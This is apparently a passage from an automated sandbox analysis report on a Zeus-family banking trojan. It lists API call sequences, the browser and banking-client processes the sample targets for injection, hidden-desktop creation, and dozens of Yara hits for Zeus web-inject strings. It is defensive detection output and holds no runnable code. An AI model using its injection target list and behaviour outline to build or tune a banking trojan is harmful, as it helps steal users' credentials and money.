SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe8_2_01521900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_01513610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_01513610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_01513610
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026495B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_026495B0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.svchost.exe.26a3c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e440000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.79.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.56.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.75.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.67.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.85.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.82.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.67.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.76.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.4900000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.83.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.59cb00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.597700.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.61.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.82.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.66.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.62.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.61.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.52.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.77.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.65.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.64.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.77.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.59.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2452000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.63.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.80.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.75.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.65.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.43c0000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.69.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.69.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.57.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.76.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.72.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.56.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.73.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.64.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.74.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e040000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.55.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.80.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.66.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.24a6c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.26a3c00.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2452000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.84.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e440000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.62.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.71.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.68.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.63.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
